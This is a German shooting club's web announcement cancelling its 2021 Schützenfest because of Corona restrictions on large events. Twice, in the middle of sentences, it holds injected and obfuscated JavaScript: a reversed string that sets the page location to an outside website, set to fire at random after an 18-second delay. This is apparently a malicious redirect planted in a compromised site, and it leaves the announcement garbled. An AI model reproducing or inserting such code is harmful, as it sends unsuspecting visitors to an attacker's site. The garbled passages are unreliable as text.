Skip to content Skip to main navigation Skip to footer

Schützenfest 2021 abgesagt!

Liebe Schützenbrüder und Schützenschwestern, liebe Bewohner unserer Dorfgemeinschaft und Freunde der SGL,

eigentlich wären es nur noch ein paar Wochen bis zu unserem Schützenfest. Normalerweise würden wir jetzt mit voller Vorfreude mitten in den Vorbereitungen stecken. Jetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doch bestimmt die weltweite Corona-Pandemie nach wie vor unser alltägliches Leben. So ist nun auch unser Schützenfest betroffen. Die Fortsetzung der aktuellen Coronaschutzverordnung untersagt Großveranstaltungen bis zum 30.06.2021. Was wir schon vermutet haben, ist nun leider offiziell. Wir müssen auch in diesem Jahr unser traditionelles Schützenfest ausfallen lassen . Wir sind natürlich traurig und enttäuscht über die Absage. Mit Blick auf die aktuellen Zahlen ist dies jetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doch die einzig richtige Maßnahme. Ein Fest, so wie wir es kennen und lieben, wäre in der jetzigen Zeit einfach nicht durchführbar. Wir hoffen, dass wir im nächsten Jahr wieder gemeinsam feiern können.

Bleibt gesund und passt auf euch auf.

Der Vorstand der SGL.